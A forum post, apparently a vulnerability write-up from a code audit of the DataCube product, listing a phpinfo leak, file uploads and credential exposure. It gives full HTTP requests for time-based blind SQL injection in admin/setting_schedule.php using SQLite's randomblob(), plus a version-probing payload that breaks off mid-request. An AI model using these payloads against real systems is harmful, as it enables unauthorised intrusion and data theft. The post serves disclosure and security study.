ToB企服应用市场:ToB评测及商务社交产业平台

标题: DataCube 毛病小结 [打印本页]
作者: 杀鸡焉用牛刀    时间: 2024-5-30 09:52
标题: DataCube 毛病小结
在这里分享一下通过拖取 DataCube 代码审计后发现的一些毛病,包括前台的文件上传,信息泄暴露账号密码,背景的文件上传。当然还有部分 SQL 注入毛病,由于 DataCube 采用的是 SQLite 的数据库,所以SQL 注入相对来说显得就很鸡肋。当然可能还有没有发现的毛病,可以互相讨论。
phpinfo 泄漏

[img=720,145.64344746162928]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536552.png[/img]

[img=720,114.61224489795919]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536553.png[/img]

SQL注入

无回显的SQL注入

[img=720,312.07517619420514]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536554.png[/img]

/DataCube/www/admin/setting_schedule.php
[img=720,278.24341279799245]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536555.png[/img]

SQLite 没有sleep()函数,但是可以用 randomblob(N) 来制造延时。randomblob(N)函数是SQLite数据库中的一个常用函数,它的作用是生成一个指定长度的随机二进制字符串。
[img=720,310.21875]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536556.png[/img]

正常请求时间
  1. POST /admin/setting_schedule.php HTTP/1.1
  2. Content-Type: application/x-www-form-urlencoded
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  5. Connection: close
  7. datetime=2024-04-24+02%3A00'+or+randomblob(9000000000000000000000000)+and+'1&tbl_type=fs&delete=1
复制代码
[img=720,310.78125]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536557.png[/img]

延时相应
判定对应的 SQLite 的版本号
[code]POST /admin/setting_schedule.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close​datetime=-1'or+(case+when(substr(sqlite_version(),1,1)



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4